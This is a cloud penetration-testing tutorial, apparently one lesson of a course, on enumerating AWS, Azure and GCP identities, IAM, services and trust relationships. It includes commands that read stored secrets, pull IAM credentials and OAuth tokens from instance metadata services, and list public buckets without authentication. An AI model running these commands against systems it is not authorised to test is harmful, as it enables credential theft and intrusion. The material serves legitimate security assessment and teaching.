Cloud Pentesting & Assessment
Cloud Enumeration & Reconnaissance
4 min read
Effective cloud reconnaissance identifies attack paths before exploitation. Understanding how to enumerate cloud services, discover misconfigurations, and map trust relationships is fundamental to cloud security testing.
AWS Enumeration
Identity Discovery
# Get current identity
aws sts get-caller-identity
# Output:
# {
# "UserId": "AIDAEXAMPLE123456789",
# "Account": "123456789012",
# "Arn": "arn:aws:iam::123456789012:user/compromised-user"
# }
# Get account aliases
aws iam list-account-aliases
IAM Enumeration
# List all users
aws iam list-users
# Get user details
aws iam get-user --user-name target-user
# List user policies (inline)
aws iam list-user-policies --user-name target-user
# List attached policies (managed)
aws iam list-attached-user-policies --user-name target-user
# Get policy details
aws iam get-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/CustomPolicy \
--version-id v1
# List roles and trust policies
aws iam list-roles
aws iam get-role --role-name interesting-role
Service Enumeration
# EC2 instances
aws ec2 describe-instances \
--query 'Reservations[*].Instances[*].[InstanceId,State.Name,PublicIpAddress,IamInstanceProfile]'
# Lambda functions
aws lambda list-functions
aws lambda get-function --function-name target-function
aws lambda get-policy --function-name target-function # Resource policy
# S3 buckets
aws s3 ls
aws s3 ls s3://bucket-name --recursive
# RDS databases
aws rds describe-db-instances
# Secrets Manager
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id secret-name
# Parameter Store
aws ssm describe-parameters
aws ssm get-parameter --name /path/to/secret --with-decryption
Network Discovery
# VPCs
aws ec2 describe-vpcs
# Security groups
aws ec2 describe-security-groups \
--query 'SecurityGroups[*].[GroupId,GroupName,IpPermissions]'
# Find publicly accessible resources
aws ec2 describe-instances \
--filters "Name=instance-state-name,Values=running" \
--query 'Reservations[*].Instances[?PublicIpAddress!=`null`].[InstanceId,PublicIpAddress]'
Azure Enumeration
Authentication and Context
# Current user context
az account show
az ad signed-in-user show
# List accessible subscriptions
az account list
# Switch subscription
az account set --subscription "subscription-name"
Resource Enumeration
# List all resources in subscription
az resource list --output table
# Virtual machines
az vm list --output table
az vm show --name vm-name --resource-group rg-name
# Storage accounts
az storage account list
az storage container list --account-name storage-account
# Key Vaults
az keyvault list
az keyvault secret list --vault-name vault-name
# App Services
az webapp list
az webapp config appsettings list --name app-name --resource-group rg-name
Azure AD Enumeration
# Users
az ad user list --query "[].{UPN:userPrincipalName,DisplayName:displayName}"
# Groups
az ad group list
az ad group member list --group "group-name"
# Service principals
az ad sp list --all
# App registrations
az ad app list --all
# Role assignments
az role assignment list --all
GCP Enumeration
Authentication Context
# Current configuration
gcloud config list
# Active account
gcloud auth list
# Project information
gcloud projects describe PROJECT_ID
Service Enumeration
# Compute instances
gcloud compute instances list
# Cloud Storage
gsutil ls
gsutil ls gs://bucket-name
# Cloud Functions
gcloud functions list
gcloud functions describe function-name
# Cloud Run
gcloud run services list
# Secret Manager
gcloud secrets list
gcloud secrets versions access latest --secret="secret-name"
# IAM policies
gcloud projects get-iam-policy PROJECT_ID
gcloud iam service-accounts list
Unauthenticated Enumeration
Public Storage Discovery
# S3 - Anonymous access
aws s3 ls s3://company-bucket --no-sign-request
# Azure Blob - Public container
curl "https://storage.blob.core.windows.net/container?restype=container&comp=list"
# GCP - Public bucket
gsutil ls gs://company-bucket
# Automated tools
# cloud_enum - multi-cloud enumeration
python3 cloud_enum.py -k company-name
# S3Scanner
s3scanner scan --bucket-file buckets.txt
Metadata Service Exploitation
AWS EC2 metadata (from compromised instance):
# IMDSv1 (if available)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
# IMDSv2 (token required)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
Azure IMDS:
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
GCP metadata:
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/"
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
Trust Relationship Mapping
Cross-Account Trust (AWS)
# Find roles trusting external accounts
aws iam list-roles --query 'Roles[?contains(AssumeRolePolicyDocument.Statement[0].Principal.AWS, `arn:aws:iam::`) && !contains(AssumeRolePolicyDocument.Statement[0].Principal.AWS, `'"$(aws sts get-caller-identity --query Account --output text)"'`)]'
# Analyze specific role trust
aws iam get-role --role-name CrossAccountRole \
--query 'Role.AssumeRolePolicyDocument'
Service-Linked Relationships
# Find Lambda execution roles
aws lambda list-functions \
--query 'Functions[*].[FunctionName,Role]'
# EC2 instance profiles
aws ec2 describe-instances \
--query 'Reservations[*].Instances[*].[InstanceId,IamInstanceProfile.Arn]'
Enumeration Quick Reference
| Cloud | Identity | Resources | Secrets |
|---|---|---|---|
| AWS | sts get-caller-identity |
ec2/s3/lambda list |
secretsmanager/ssm |
| Azure | az account show |
az resource list |
az keyvault |
| GCP | gcloud config list |
gcloud compute/storage |
gcloud secrets |
Next, we'll explore exploitation techniques and privilege escalation in cloud environments. :::